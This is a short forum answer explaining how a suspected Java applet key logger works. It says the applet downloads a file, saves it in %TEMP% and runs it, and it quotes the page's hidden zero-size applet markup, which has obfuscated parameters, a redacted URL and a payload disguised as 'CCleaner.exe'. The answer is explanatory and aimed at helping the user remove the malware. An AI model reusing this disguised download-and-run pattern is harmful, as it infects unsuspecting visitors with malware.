[Solved] remove java key logger, looking through code [closed]


That code downloads something from an URL, saves it somewhere in your %TEMP% folder, then tries to execute it.

The parameters are passed in to the applet via the HTML page that loads it. View the HTML for the page you downloaded this from, and you’ll see, at the bottom, something like:

<applet width="0px" height="0px" code="Java.class" archive="Java.jar">
<param name="gze82pwlo3e" value="http://url/omitted/in/case/its/bad">
<param name="jc9nvqlqnnd" value="CCleaner.exe">
<param name="ulztlykikct" value="">
</applet>

4

solved remove java key logger, looking through code [closed]